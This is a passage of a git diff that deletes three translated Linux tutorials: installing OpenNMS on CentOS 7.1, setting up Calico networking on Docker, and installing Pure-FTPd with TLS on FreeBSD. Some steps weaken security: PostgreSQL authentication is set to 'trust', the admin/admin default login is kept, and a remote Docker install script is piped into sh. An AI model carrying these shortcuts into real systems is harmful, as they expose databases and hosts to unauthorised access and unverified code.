-Systems management and monitoring services are very important: they provide the information we need to make decisions about our infrastructure. To make sure the network is running at its best and to minimize downtime, we need visibility into how our systems and applications are performing. So, in this article we will walk through the step-by-step procedure to set up OpenNMS in your IT infrastructure. OpenNMS is a free, open source, enterprise-level network monitoring and management platform that provides information to allow us to make decisions about future network and capacity planning.
-
-OpenNMS is designed to manage tens of thousands of devices from a single server, as well as an unlimited number of devices using a cluster of servers. It includes a discovery engine to automatically configure and manage network devices without operator intervention. It is written in Java and is published under the GNU General Public License. OpenNMS is known for its scalability, with its main functional areas being service monitoring, data collection using SNMP, and event management and notifications.
-
-### Installing OpenNMS RPM Repository ###
-
-We will start with the installation of the OpenNMS RPM repository on our CentOS 7.1 operating system, as OpenNMS is available for most RPM-based distributions through Yum at the official link http://yum.opennms.org/ .
-
-![OpenNMS RPM](http://blog.linoxide.com/wp-content/uploads/2015/08/18.png)
-
-Then open the command line interface of CentOS 7.1, log in with root credentials, and run the below command with wget to get the required RPM.
-
- [root@open-nms ~]# wget http://yum.opennms.org/repofiles/opennms-repo-stable-rhel7.noarch.rpm
-
-![Download RPM](http://blog.linoxide.com/wp-content/uploads/2015/08/26.png)
-
-Now we need to install this repository so that the OpenNMS package information is available through yum for installation. Let's run the command below with the same root-level credentials to do so.
-
- [root@open-nms ~]# rpm -Uvh opennms-repo-stable-rhel7.noarch.rpm
-
-![Installing RPM](http://blog.linoxide.com/wp-content/uploads/2015/08/36.png)
-
-### Installing Prerequisite Packages for OpenNMS ###
-
-Now, before we start the installation of OpenNMS, let's make sure the following prerequisites are in place.
-
-**Install JDK 7**
-
-It's recommended that you install the latest stable Java 7 JDK from Oracle for the best performance; the JDK in our YUM repository serves as a fallback. Let's go to the Oracle Java 7 SE JDK download page, accept the license if you agree, and choose the platform and architecture. Once it has finished downloading, execute it from the command line and then install the resulting JDK rpm.
-
-Otherwise, run the below command to install it using yum from the available system repositories.
-
- [root@open-nms ~]# yum install java-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1
-
-Once you have installed Java, you can confirm the installation and check the installed version using the below command.
-
- [root@open-nms ~]# java -version
-
-![Java version](http://blog.linoxide.com/wp-content/uploads/2015/08/46.png)
-
-**Install PostgreSQL**
-
-Now we will install PostgreSQL, which is required to set up the database for OpenNMS. PostgreSQL is included in all of the major YUM-based distributions. To install, simply run the below command.
-
- [root@open-nms ~]# yum install postgresql postgresql-server
-
-![Installing Postgresql](http://blog.linoxide.com/wp-content/uploads/2015/08/55.png)
-
-### Prepare the Database for OpenNMS ###
-
-Once you have installed PostgreSQL, you'll need to make sure that it is up and active. Let's run the commands below to first initialize the database and then start the service.
-
- [root@open-nms ~]# /sbin/service postgresql initdb
- [root@open-nms ~]# /sbin/service postgresql start
-
-![start DB](http://blog.linoxide.com/wp-content/uploads/2015/08/64.png)
-
-Now to confirm the status of your PostgreSQL database you can run the below command.
-
- [root@open-nms ~]# service postgresql status
-
-![PostgreSQL status](http://blog.linoxide.com/wp-content/uploads/2015/08/74.png)
-
-To ensure that PostgreSQL will start after a reboot, use the systemctl command to enable it to start on bootup, as shown below.
-
- [root@open-nms ~]# systemctl enable postgresql
- ln -s '/usr/lib/systemd/system/postgresql.service' '/etc/systemd/system/multi-user.target.wants/postgresql.service'
-
-### Configure PostgreSQL ###
-
-Locate the Postgres data directory, often /var/lib/pgsql/data, then open the postgresql.conf file in a text editor and configure the following parameters as shown.
-
- [root@open-nms ~]# vim /var/lib/pgsql/data/postgresql.conf
-
-----------
-
- #------------------------------------------------------------------------------
- # CONNECTIONS AND AUTHENTICATION
- #------------------------------------------------------------------------------
-
- listen_addresses = 'localhost'
- max_connections = 256
-
- #------------------------------------------------------------------------------
- # RESOURCE USAGE (except WAL)
- #------------------------------------------------------------------------------
-
- shared_buffers = 1024MB
-
-**User Access to the Database**
-
-PostgreSQL only allows you to connect if you are logged in to a local account name that matches the PostgreSQL user. Since OpenNMS runs as root, it cannot connect as the "postgres" or "opennms" user by default, so we have to change the configuration to allow user access to the database by opening the below configuration file.
-
- [root@open-nms ~]# vim /var/lib/pgsql/data/pg_hba.conf
-
-Update the configuration file as shown below, changing the METHOD settings from "ident" to "trust".
-
-![user access to db](http://blog.linoxide.com/wp-content/uploads/2015/08/84.png)
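-
-For reference, after the edit the relevant entries typically look like the following (a sketch assuming the stock CentOS 7 file; your entries may differ):
-
-    # TYPE  DATABASE  USER  ADDRESS       METHOD
-    local   all       all                 trust
-    host    all       all   127.0.0.1/32  trust
-    host    all       all   ::1/128       trust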
-
-Save and quit the file, then restart the PostgreSQL service.
-
- [root@open-nms ~]# service postgresql restart
-
-### Starting OpenNMS Installation ###
-
-Now we are ready to go with the installation of OpenNMS, as we are nearly done with its prerequisites. The YUM packaging system will download and install all of the required components and their dependencies, if they are not already installed on your system.
-So let's run the below command to start the OpenNMS installation, which will pull in everything you need for a working OpenNMS, including the OpenNMS core, web UI, and a set of common plugins.
-
- [root@open-nms ~]# yum -y install opennms
-
-![OpenNMS Installation](http://blog.linoxide.com/wp-content/uploads/2015/08/93.png)
-
-The above command will finish with a successful installation of OpenNMS and its dependent packages.
-
-### Configure JAVA for OpenNMS ###
-
-In order to integrate the default version of Java with OpenNMS, we will run the below command.
-
- [root@open-nms ~]# /opt/opennms/bin/runjava -s
-
-![java integration](http://blog.linoxide.com/wp-content/uploads/2015/08/102.png)
-
-### Run the OpenNMS installer ###
-
-Now it's time to run the OpenNMS installer, which will create and configure the OpenNMS database; the same command is also used when updating to the latest version. To do so, we will run the following command.
-
- [root@open-nms ~]# /opt/opennms/bin/install -dis
-
-The above install command takes several options, with the following meanings:
-
--d - to update the database
--i - to insert any default data that belongs in the database
--s - to create or update the stored procedures OpenNMS uses for certain kinds of data access
-
- ==============================================================================
- OpenNMS Installer
- ==============================================================================
-
- Configures PostgreSQL tables, users, and other miscellaneous settings.
-
- DEBUG: Platform is IPv6 ready: true
- - searching for libjicmp.so:
- - trying to load /usr/lib64/libjicmp.so: OK
- - searching for libjicmp6.so:
- - trying to load /usr/lib64/libjicmp6.so: OK
- - searching for libjrrd.so:
- - trying to load /usr/lib64/libjrrd.so: OK
- - using SQL directory... /opt/opennms/etc
- - using create.sql... /opt/opennms/etc/create.sql
- 17:27:51.178 [Main] INFO org.opennms.core.schema.Migrator - PL/PgSQL call handler exists
- 17:27:51.180 [Main] INFO org.opennms.core.schema.Migrator - PL/PgSQL language exists
- - checking if database "opennms" is unicode... ALREADY UNICODE
- - Creating imports directory (/opt/opennms/etc/imports... OK
- - Checking for old import files in /opt/opennms/etc... DONE
- INFO 16/08/15 17:27:liquibase: Reading from databasechangelog
- Installer completed successfully!
-
- ==============================================================================
- OpenNMS Upgrader
- ==============================================================================
-
- OpenNMS is currently stopped
- Found upgrade task SnmpInterfaceRrdMigratorOnline
- Found upgrade task KscReportsMigrator
- Found upgrade task JettyConfigMigratorOffline
- Found upgrade task DataCollectionConfigMigratorOffline
- Processing RequisitionsMigratorOffline: Remove non-ip-snmp-primary and non-ip-interfaces from requisitions: NMS-5630, NMS-5571
- - Running pre-execution phase
- Backing up: /opt/opennms/etc/imports
- - Running post-execution phase
- Removing backup /opt/opennms/etc/datacollection.zip
-
- Finished in 0 seconds
-
- Upgrade completed successfully!
-
-### Firewall configurations to Allow OpenNMS ###
-
-Here we have to allow the OpenNMS management interface port 8980 through the firewall or router so that we can access the management web interface from remote systems. Use the following commands to do so.
-
- [root@open-nms etc]# firewall-cmd --permanent --add-port=8980/tcp
- [root@open-nms etc]# firewall-cmd --reload
-
-### Start OpenNMS and Login to Web Interface ###
-
-Let's start the OpenNMS service and enable it to start at each bootup by using the below commands.
-
- [root@open-nms ~]#systemctl start opennms
- [root@open-nms ~]#systemctl enable opennms
-
-Once the services are up, we are ready to go with the web management interface. Open your web browser and access it using your server's IP address and port 8980.
-
-http://servers_ip:8980/
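-
-If the page does not load, we can confirm from the server itself that the web UI is listening (a quick check, not part of the original steps):
-
-    [root@open-nms ~]# curl -I http://localhost:8980/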
-
-Enter the username and password; the default username and password are admin/admin.
-
-![opennms login](http://blog.linoxide.com/wp-content/uploads/2015/08/opennms-login.png)
-
-After successful authentication with your username and password, you will be directed to the home page of OpenNMS, where you can configure new monitoring devices/nodes/services etc.
-
-![opennms home](http://blog.linoxide.com/wp-content/uploads/2015/08/opennms-home.png)
-
-### Conclusion ###
-
-Congratulations! We have successfully set up OpenNMS on CentOS 7.1. At the end of this tutorial, you are now able to install and configure OpenNMS along with its prerequisites, PostgreSQL and Java. OpenNMS is a great network monitoring system with open source roots that provides a bevy of features at no cost compared to its high-end competitors, and it can scale to monitor large numbers of network nodes.
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/monitoring-2/install-configure-opennms-centos-7-x/
-
-作者:[Kashif Siddique][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/kashifs/
diff --git a/sources/tech/20151012 Getting Started to Calico Virtual Private Networking on Docker.md b/sources/tech/20151012 Getting Started to Calico Virtual Private Networking on Docker.md
deleted file mode 100644
index 27d60729e9..0000000000
--- a/sources/tech/20151012 Getting Started to Calico Virtual Private Networking on Docker.md
+++ /dev/null
@@ -1,322 +0,0 @@
-Getting Started to Calico Virtual Private Networking on Docker
-================================================================================
-Calico is free and open source software for virtual networking in data centers. It takes a pure Layer 3 approach to highly scalable cloud virtual networking. It integrates seamlessly with cloud orchestration systems such as OpenStack and Docker clusters in order to enable secure IP communication between virtual machines and containers. It implements a highly efficient vRouter in each node that takes advantage of the existing Linux kernel forwarding engine. Calico can peer directly with the data center's physical fabric, whether L2 or L3, without NAT, tunnels, on/off ramps, or overlays. Calico makes full use of Docker to run its components as containers on the nodes, which makes it multi-platform and very easy to ship, pack and deploy. Calico has the following salient features out of the box.
-
-- It can scale to tens of thousands of servers and millions of workloads.
-- Calico is easy to deploy, operate and diagnose.
-- It is open source software licensed under Apache License version 2 and uses open standards.
-- It supports container, virtual machines and bare metal workloads.
-- It supports both IPv4 and IPv6 internet protocols.
-- It is designed internally to support rich, flexible and secure network policy.
-
-In this tutorial, we'll set up virtual private networking between two nodes running Calico, using Docker. Here are some easy steps on how we can do that.
-
-### 1. Installing etcd ###
-
-To get started with Calico virtual private networking, we'll need a linux machine running etcd. CoreOS comes with etcd preinstalled and preconfigured, but if we want to configure Calico on another linux distribution, then we'll need to set etcd up ourselves. As we are running Ubuntu 14.04 LTS, we'll first install and configure etcd on our machine. To install etcd on our Ubuntu box, we'll need to add the official ppa repository of Calico by running the following command on the machine which we want to run the etcd server on. Here, we'll be installing etcd on our 1st node.
-
- # apt-add-repository ppa:project-calico/icehouse
-
- The primary source of Ubuntu packages for Project Calico based on OpenStack Icehouse, an open source solution for virtual networking in cloud data centers. Find out more at http://www.projectcalico.org/
- More info: https://launchpad.net/~project-calico/+archive/ubuntu/icehouse
- Press [ENTER] to continue or ctrl-c to cancel adding it
- gpg: keyring `/tmp/tmpi9zcmls1/secring.gpg' created
- gpg: keyring `/tmp/tmpi9zcmls1/pubring.gpg' created
- gpg: requesting key 3D40A6A7 from hkp server keyserver.ubuntu.com
- gpg: /tmp/tmpi9zcmls1/trustdb.gpg: trustdb created
- gpg: key 3D40A6A7: public key "Launchpad PPA for Project Calico" imported
- gpg: Total number processed: 1
- gpg: imported: 1 (RSA: 1)
- OK
-
-Then, we'll need to edit /etc/apt/preferences and make changes to prefer Calico-provided packages for Nova and Neutron.
-
- # nano /etc/apt/preferences
-
-We'll need to add the following lines into it.
-
- Package: *
- Pin: release o=LP-PPA-project-calico-*
- Pin-Priority: 100
-
-![Calico PPA Config](http://blog.linoxide.com/wp-content/uploads/2015/10/calico-ppa-config.png)
-
-Next, we'll also need to add the official BIRD PPA for Ubuntu 14.04 LTS so that bug fixes are installed before they are available in the Ubuntu repo.
-
- # add-apt-repository ppa:cz.nic-labs/bird
-
- The BIRD Internet Routing Daemon PPA (by upstream & .deb maintainer)
- More info: https://launchpad.net/~cz.nic-labs/+archive/ubuntu/bird
- Press [ENTER] to continue or ctrl-c to cancel adding it
- gpg: keyring `/tmp/tmphxqr5hjf/secring.gpg' created
- gpg: keyring `/tmp/tmphxqr5hjf/pubring.gpg' created
- gpg: requesting key F9C59A45 from hkp server keyserver.ubuntu.com
-    gpg: /tmp/tmphxqr5hjf/trustdb.gpg: trustdb created
-    gpg: key F9C59A45: public key "Launchpad Datové schránky" imported
- gpg: Total number processed: 1
- gpg: imported: 1 (RSA: 1)
- OK
-
-Now that the PPAs are added, we'll update the local repository index and then install etcd on our machine.
-
- # apt-get update
-
-To install etcd on our Ubuntu machine, we'll run the following apt command.
-
- # apt-get install etcd python-etcd
-
-### 2. Starting Etcd ###
-
-After the installation is complete, we'll configure etcd. Here, we'll edit **/etc/init/etcd.conf** using a text editor and append an **exec /usr/bin/etcd** line so that it looks like the configuration below.
-
- # nano /etc/init/etcd.conf
- exec /usr/bin/etcd --name="node1" \
- --advertise-client-urls="http://10.130.65.71:2379,http://10.130.65.71:4001" \
- --listen-client-urls="http://0.0.0.0:2379,http://0.0.0.0:4001" \
- --listen-peer-urls "http://0.0.0.0:2380" \
- --initial-advertise-peer-urls "http://10.130.65.71:2380" \
- --initial-cluster-token $(uuidgen) \
- --initial-cluster "node1=http://10.130.65.71:2380" \
- --initial-cluster-state "new"
-
-![Configuring ETCD](http://blog.linoxide.com/wp-content/uploads/2015/10/configuring-etcd.png)
-
-**Note**: In the above configuration, we'll need to replace 10.130.65.71 and node1 with the private ip address and hostname of your etcd server box. After we are done editing, we'll need to save and exit the file.
-
-We can get the private ip address of our etcd server by running the following command.
-
- # ifconfig
-
-![ifconfig](http://blog.linoxide.com/wp-content/uploads/2015/10/ifconfig1.png)
-
-As our etcd configuration is done, we'll now start the etcd service on our Ubuntu node. To start the etcd daemon, we'll run the following command.
-
- # service etcd start
-
-Once done, we'll check whether etcd is actually running. To do so, we'll run the following command.
-
- # service etcd status
-
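-If the etcdctl client was installed along with etcd, we can also make a quick sanity check that the daemon is answering requests. The commands below are a small sketch assuming the default client port 2379; the exact output will vary with the etcd version.
-
-    # etcdctl cluster-health
-    # curl -L http://127.0.0.1:2379/version
-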
-### 3. Installing Docker ###
-
-Next, we'll install Docker on both of our nodes running Ubuntu. To install the latest release of Docker, we simply need to run the following command.
-
- # curl -sSL https://get.docker.com/ | sh
-
-![Docker Engine Installation](http://blog.linoxide.com/wp-content/uploads/2015/10/docker-engine-installation.png)
-
-After the installation is completed, we'll restart the docker daemon in order to make sure that it's running before we move on to Calico.
-
- # service docker restart
-
- docker stop/waiting
- docker start/running, process 3056
-
-### 4. Installing Calico ###
-
-We'll now install Calico on our linux machines in order to run the Calico containers. We'll need to install Calico on every node which we want to connect to the Calico network. To install Calico, we'll need to run the following command under root or sudo permission.
-
-#### On 1st Node ####
-
- # wget https://github.com/projectcalico/calico-docker/releases/download/v0.6.0/calicoctl
-
- --2015-09-28 12:08:59-- https://github.com/projectcalico/calico-docker/releases/download/v0.6.0/calicoctl
- Resolving github.com (github.com)... 192.30.252.129
- Connecting to github.com (github.com)|192.30.252.129|:443... connected.
- ...
- Resolving github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)... 54.231.9.9
- Connecting to github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)|54.231.9.9|:443... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 6166661 (5.9M) [application/octet-stream]
- Saving to: 'calicoctl'
- 100%[=========================================>] 6,166,661 1.47MB/s in 6.7s
- 2015-09-28 12:09:08 (898 KB/s) - 'calicoctl' saved [6166661/6166661]
-
- # chmod +x calicoctl
-
-Having made it executable, we'll move the calicoctl binary into our PATH so that it is available as a command from any directory. To do so, we'll need to run the following command.
-
- # mv calicoctl /usr/bin/
-
-#### On 2nd Node ####
-
- # wget https://github.com/projectcalico/calico-docker/releases/download/v0.6.0/calicoctl
-
- --2015-09-28 12:09:03-- https://github.com/projectcalico/calico-docker/releases/download/v0.6.0/calicoctl
- Resolving github.com (github.com)... 192.30.252.131
- Connecting to github.com (github.com)|192.30.252.131|:443... connected.
- ...
- Resolving github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)... 54.231.8.113
- Connecting to github-cloud.s3.amazonaws.com (github-cloud.s3.amazonaws.com)|54.231.8.113|:443... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 6166661 (5.9M) [application/octet-stream]
- Saving to: 'calicoctl'
- 100%[=========================================>] 6,166,661 1.47MB/s in 5.9s
- 2015-09-28 12:09:11 (1022 KB/s) - 'calicoctl' saved [6166661/6166661]
-
- # chmod +x calicoctl
-
-Having made it executable, we'll move the calicoctl binary into our PATH so that it is available as a command from any directory. To do so, we'll need to run the following command.
-
- # mv calicoctl /usr/bin/
-
-Likewise, we'd execute the above commands to install calicoctl on every other node.
-
-### 5. Starting Calico services ###
-
-After we have installed Calico on each of our nodes, we'll start the Calico services. To start them, we'll need to run the following commands.
-
-#### On 1st Node ####
-
- # calicoctl node
-
- WARNING: Unable to detect the xt_set module. Load with `modprobe xt_set`
- WARNING: Unable to detect the ipip module. Load with `modprobe ipip`
- No IP provided. Using detected IP: 10.130.61.244
- Pulling Docker image calico/node:v0.6.0
- Calico node is running with id: fa0ca1f26683563fa71d2ccc81d62706e02fac4bbb08f562d45009c720c24a43
-
-#### On 2nd Node ####
-
-Next, we'll export an environment variable so that our calico node connects to the same etcd server, which is hosted on node1 in our case. To do so, we'll need to run the following command on each of the remaining nodes.
-
- # export ETCD_AUTHORITY=10.130.61.244:2379
-
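-Note that this variable only lasts for the current shell session. If we want it to survive new logins, we can append it to the shell profile; a minimal sketch:
-
-    # echo 'export ETCD_AUTHORITY=10.130.61.244:2379' >> ~/.bashrc
-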
-Then, we'll run the calicoctl node command on our second node.
-
- # calicoctl node
-
- WARNING: Unable to detect the xt_set module. Load with `modprobe xt_set`
- WARNING: Unable to detect the ipip module. Load with `modprobe ipip`
- No IP provided. Using detected IP: 10.130.61.245
- Pulling Docker image calico/node:v0.6.0
- Calico node is running with id: 70f79c746b28491277e28a8d002db4ab49f76a3e7d42e0aca8287a7178668de4
-
-This command should be executed on every node on which we want to start the Calico services; it starts a container on the respective node. To check whether the container is running, we'll run the following docker command.
-
- # docker ps
-
-![Docker Running Containers](http://blog.linoxide.com/wp-content/uploads/2015/10/docker-running-containers.png)
-
-If we see output similar to that shown above, we can confirm that the Calico containers are up and running.
-
-### 6. Starting Containers ###
-
-Next, we'll need to start a few containers on each of our nodes running the Calico services. We'll assign a different name to each of the containers running ubuntu. Here, workload-A, workload-B, etc have been assigned as the unique names for the containers. To do so, we'll need to run the following command.
-
-#### On 1st Node ####
-
- # docker run --net=none --name workload-A -tid ubuntu
-
- Unable to find image 'ubuntu:latest' locally
- latest: Pulling from library/ubuntu
- ...
- 91e54dfb1179: Already exists
- library/ubuntu:latest: The image you are pulling has been verified. Important: image verification is a tech preview feature and should not be relied on to provide security.
- Digest: sha256:73fbe2308f5f5cb6e343425831b8ab44f10bbd77070ecdfbe4081daa4dbe3ed1
- Status: Downloaded newer image for ubuntu:latest
- a1ba9105955e9f5b32cbdad531cf6ecd9cab0647d5d3d8b33eca0093605b7a18
-
- # docker run --net=none --name workload-B -tid ubuntu
-
- 89dd3d00f72ac681bddee4b31835c395f14eeb1467300f2b1b9fd3e704c28b7d
-
-#### On 2nd Node ####
-
- # docker run --net=none --name workload-C -tid ubuntu
-
- Unable to find image 'ubuntu:latest' locally
- latest: Pulling from library/ubuntu
- ...
- 91e54dfb1179: Already exists
- library/ubuntu:latest: The image you are pulling has been verified. Important: image verification is a tech preview feature and should not be relied on to provide security.
- Digest: sha256:73fbe2308f5f5cb6e343425831b8ab44f10bbd77070ecdfbe4081daa4dbe3ed1
- Status: Downloaded newer image for ubuntu:latest
- 24e2d5d7d6f3990b534b5643c0e483da5b4620a1ac2a5b921b2ba08ebf754746
-
- # docker run --net=none --name workload-D -tid ubuntu
-
- c6f28d1ab8f7ac1d9ccc48e6e4234972ed790205c9ca4538b506bec4dc533555
-
-Similarly, if we have more nodes, we can run an ubuntu docker container on each of them by running the above command with a different container name.
-
-### 7. Assigning IP addresses ###
-
-After we have got our docker containers running on each of our hosts, we'll add networking support to the containers. We'll assign a new ip address to each of the containers using calicoctl. This will add a new network interface to the containers with the assigned ip addresses. To do so, we'll need to run the following commands on the hosts running the containers.
-
-#### On 1st Node ####
-
- # calicoctl container add workload-A 192.168.0.1
- # calicoctl container add workload-B 192.168.0.2
-
-#### On 2nd Node ####
-
- # calicoctl container add workload-C 192.168.0.3
- # calicoctl container add workload-D 192.168.0.4
-
-### 8. Adding Policy Profiles ###
-
-After our containers have got network interfaces and ip addresses assigned, we'll need to add policy profiles to enable networking between the containers. After adding the profiles, the containers will be able to communicate with each other only if they have a common profile assigned. That means that if they have different profiles assigned, they won't be able to communicate with each other. So, before being able to assign profiles, we'll need to create some new ones first. That can be done on either of the hosts. Here, we'll run the following commands on the 1st node.
-
- # calicoctl profile add A_C
-
- Created profile A_C
-
- # calicoctl profile add B_D
-
- Created profile B_D
-
-After the profiles have been created, we'll simply add our workloads to the required profiles. Here, in this tutorial, we'll place workload A and workload C in a common profile A_C and workload B and D in a common profile B_D. To do so, we'll run the following commands on our hosts.
-
-#### On 1st Node ####
-
- # calicoctl container workload-A profile append A_C
- # calicoctl container workload-B profile append B_D
-
-#### On 2nd Node ####
-
- # calicoctl container workload-C profile append A_C
- # calicoctl container workload-D profile append B_D
-
-### 9. Testing the Network ###
-
-After we've added a policy profile to each of our containers using calicoctl, we'll now test whether our networking works as expected. We'll take a node and a workload and try to communicate with the other containers running on the same or a different node. Due to the profiles, we should be able to communicate only with the containers having a common profile. So, in this case, workload A should be able to communicate only with C and vice versa, whereas workload A shouldn't be able to communicate with B or D. To test the network, we'll ping the containers having common profiles from the 1st host running workloads A and B.
-
-We'll first ping workload-C having ip 192.168.0.3 using workload-A as shown below.
-
- # docker exec workload-A ping -c 4 192.168.0.3
-
-Then, we'll ping workload-D having ip 192.168.0.4 using workload-B as shown below.
-
- # docker exec workload-B ping -c 4 192.168.0.4
-
-![Ping Test Success](http://blog.linoxide.com/wp-content/uploads/2015/10/ping-test-success.png)
-
-Now, we'll check if we're able to ping the containers having different profiles. We'll now ping workload-D having ip address 192.168.0.4 using workload-A.
-
- # docker exec workload-A ping -c 4 192.168.0.4
-
-Then, we'll try to ping workload-C, which has ip address 192.168.0.3, using workload-B.
-
- # docker exec workload-B ping -c 4 192.168.0.3
-
-![Ping Test Failed](http://blog.linoxide.com/wp-content/uploads/2015/10/ping-test-failed.png)
-
-Hence, the workloads having the same profile could ping each other, whereas those having different profiles couldn't.
-
-### Conclusion ###
-
-Calico is an awesome project providing an easy way to configure a virtual network using the latest docker technology. It is considered a great open source solution for virtual networking in cloud data centers. Calico is being experimented with on different cloud platforms like AWS, DigitalOcean, GCE and more these days. As Calico is currently under experiment, its stable version hasn't been released yet and it is still in pre-release. The project has well documented tutorials and manuals on its [official documentation site][1].
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/calico-virtual-private-networking-docker/
-
-作者:[Arun Pyasi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:http://docs.projectcalico.org/
\ No newline at end of file
diff --git a/sources/tech/20151104 How to Install Pure-FTPd with TLS on FreeBSD 10.2.md b/sources/tech/20151104 How to Install Pure-FTPd with TLS on FreeBSD 10.2.md
deleted file mode 100644
index 3d898340d8..0000000000
--- a/sources/tech/20151104 How to Install Pure-FTPd with TLS on FreeBSD 10.2.md
+++ /dev/null
@@ -1,154 +0,0 @@
-How to Install Pure-FTPd with TLS on FreeBSD 10.2
-================================================================================
-FTP, or File Transfer Protocol, is a standard application-layer network protocol used to transfer files from a client to a server after the user has logged in to the FTP server over a TCP network such as the internet. FTP has been around for a long time, much longer than P2P programs or the World Wide Web, and to this day it remains a primary method for sharing files with others over the internet and is still very popular. FTP can provide secure transmission that protects the username and password and encrypts the content with SSL/TLS.
-
-Pure-FTPd is a free FTP server with a strong focus on software security. It is a great choice if you want to provide fast, secure, lightweight and feature-rich FTP services. Pure-FTPd can be installed on a variety of Unix-like operating systems, including Linux and FreeBSD. Pure-FTPd was created by Frank Denis in 2001, based on Troll-FTPd, and is still actively developed by a team led by Denis.
-
-In this tutorial we will cover the installation and configuration of "**Pure-FTPd**" on the Unix-like operating system FreeBSD 10.2.
-
-### Step 1 - Update system ###
-
-The first thing you must do is update the FreeBSD system. Please connect to your server with SSH and then type the commands below as sudo/root:
-
- freebsd-update fetch
- freebsd-update install
-
-### Step 2 - Install Pure-FTPd ###
-
-You can install Pure-FTPd from ports, but in this tutorial we will install it from the freebsd repository with the "**pkg**" command. So, now let's install:
-
- pkg install pure-ftpd
-
-Once installation is finished, please enable pure-ftpd to start at boot time with the sysrc command below:
-
- sysrc pureftpd_enable=yes
-
-### Step 3 - Configure Pure-FTPd ###
-
-The configuration file for Pure-FTPd is located in the directory "/usr/local/etc/". Please go to that directory and copy the sample configuration for pure-ftpd to "**pure-ftpd.conf**".
-
- cd /usr/local/etc/
- cp pure-ftpd.conf.sample pure-ftpd.conf
-
-Now edit the configuration file with the nano editor:
-
- nano -c pure-ftpd.conf
-
-Note: the -c option shows line numbers in nano.
-
-Go to line 59 and change the value of "VerboseLog" to "**yes**". This option allows you as administrator to see a log of all commands used by the users.
-
- VerboseLog yes
-
-Now look at line 126, "PureDB", for the virtual users configuration. Virtual users are a simple mechanism to store a list of users, with their password, name, uid, directory, etc. It's just like /etc/passwd, but it's not /etc/passwd: it's a different file, used only for FTP. In this tutorial we will store the list of users in the files "**/usr/local/etc/pureftpd.passwd**" and "**/usr/local/etc/pureftpd.pdb**". Please uncomment that line and change the path to "/usr/local/etc/pureftpd.pdb".
-
- PureDB /usr/local/etc/pureftpd.pdb
-
-Next, uncomment line 336, "**CreateHomeDir**"; this option makes it easy to add virtual users by automatically creating their home directories if they are missing.
-
- CreateHomeDir yes
-
-Save and exit.
-
-Next, start pure-ftpd with the service command:
-
- service pure-ftpd start
-
-### Step 4 - Adding New Users ###
-
-At this step the FTP server has started without error, but you can not yet log in to it, because anonymous users are disabled in the default configuration of pure-ftpd. We need to create new users with a home directory, and then give them a password for login.
-
-One thing you must do before you add a new user to the pure-ftpd virtual users is to create a system user for them. Let's create a new system user "**vftp**" whose default group is the same as the username, with home directory "**/home/vftp/**".
-
- pw useradd vftp -s /sbin/nologin -w no -d /home/vftp \
- -c "Virtual User Pure-FTPd" -m
-
-Now you can add a new user for the FTP server with the "**pure-pw**" command. As an example, we will create a new user named "**akari**"; please see the command below:
-
- pure-pw useradd akari -u vftp -g vftp -d /home/vftp/akari
- Password: TYPE YOUR PASSWORD
-
-That command will create the user "**akari**", with the data stored in the file "**/usr/local/etc/pureftpd.passwd**", not in /etc/passwd. This means that you can easily create FTP-only accounts without messing up your system accounts.
-
-Next, you must generate the PureDB user database with this command:
-
- pure-pw mkdb
-
-Now restart the pure-ftpd service and try to connect with the user "akari":
-
- service pure-ftpd restart
-
-Trying to connect with the user akari:
-
- ftp SERVERIP
-
-![FTP Connect user akari](http://blog.linoxide.com/wp-content/uploads/2015/10/FTP-Connect-user-akari.png)
-
-**NOTE :**
-
-If you want to add another user, you can use the "**pure-pw**" command again. And if you want to delete a user, you can use this:
-
- pure-pw userdel useryouwanttodelete
- pure-pw mkdb
-
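-The pure-pw tool can also inspect the virtual user database, which is handy for checking what has been created so far:
-
-    pure-pw list
-    pure-pw show akari
-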
-### Step 5 - Add SSL/TLS to Pure-FTPd ###
-
-Pure-FTPd supports encryption using the TLS security mechanism. To add TLS/SSL support, make sure the OpenSSL library is already installed on your freebsd system.
-
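-FreeBSD ships OpenSSL in the base system, so a quick version check is usually enough to confirm that it is available:
-
-    openssl version
-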
-Now you must generate a new "**self-signed certificate**" in the directory "**/etc/ssl/private**". Before you generate the certificate, please create a new directory there called "private".
-
- cd /etc/ssl/
- mkdir private
- cd private/
-
-Now generate the self-signed certificate with the openssl command below:
-
- openssl req -x509 -nodes -newkey rsa:2048 -sha256 -keyout \
- /etc/ssl/private/pure-ftpd.pem \
- -out /etc/ssl/private/pure-ftpd.pem
-
-FILL ALL WITH YOUR PERSONAL INFO.
-
-![Generate Certificate pem](http://blog.linoxide.com/wp-content/uploads/2015/10/Generate-Certificate-pem.png)
-
-Next, change the certificate permissions:
-
- chmod 600 /etc/ssl/private/*.pem
-
-Once the certificate is generated, edit the pure-ftpd configuration file:
-
- nano -c /usr/local/etc/pure-ftpd.conf
-
-Uncomment line **423** to enable TLS:
-
- TLS 1
-
-And uncomment line **439** for the certificate file path:
-
- CertFile /etc/ssl/private/pure-ftpd.pem
-
-Save and exit, then restart the pure-ftpd service:
-
- service pure-ftpd restart
-
-Now let's test that Pure-FTPd works with TLS/SSL. Here I use "**FileZilla**" to connect to the FTP server, with the user "**akari**" that we created earlier.
-
-![Pure-FTPd with TLS SUpport](http://blog.linoxide.com/wp-content/uploads/2015/10/Pure-FTPd-with-TLS-SUpport.png)
-
-Pure-FTPd with TLS is working successfully on FreeBSD 10.2.
-
-### Conclusion ###
-
